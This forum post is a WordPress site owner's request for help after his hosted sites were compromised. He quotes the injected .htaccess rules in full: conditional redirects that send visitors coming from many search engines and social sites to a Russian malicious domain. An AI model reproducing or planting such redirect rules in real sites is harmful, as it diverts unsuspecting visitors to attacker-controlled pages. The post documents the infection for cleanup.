Malicious code in WordPress installations; how remove?
-
Any thoughts on what to do about this? Some Russian site has apparently placed malicious code into my installation of WordPress 3.3.1 on a GoDaddy hosted site. When I look at the WordPress code with the editor (and I am not terribly savvy under the hood of WP) I find massive amounts of gobbledygook before the <div> tags encompassing the WP code in just one of my domains, but then suspicious stuff in the .htaccess files of all 6 of them.
So, I removed all the goobbledygook in all the various php files of the domain where I found it. But when I come to the ‘search.php’ page in the WP code editor, in the first place the page looks odd — with the WP nav bar options and text on the left all highlighted in blue in blue rectangles. And when I try to delete the code here and hit ‘Update File,’ it throws me out of the dashboard to a “Problem Loading the Page’ error that includes the address of the Russian site:
https://daliachu-uaroyalys.ru/industry/index.phpHere is a look at the ‘search.php’ page and a glimpse of the gobbledygook:
https://hundredmountain.com/malicious_code_screenshot.jpgThen, when I look at every single .htaccess file for every one of a half-dozen WP installations in folders at my hosted site, they all have the following as the entire code in each of the WP file’s .htaccess files with the Russian address included. What I do here?
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ https://daliachu-uaroyalys.ru/industry/index.php [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ https://daliachu-uaroyalys.ru/industry/index.php [R=301,L] </IfModule>
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
……..
How do I deal with this?Douglas I
- The topic ‘Malicious code in WordPress installations; how remove?’ is closed to new replies.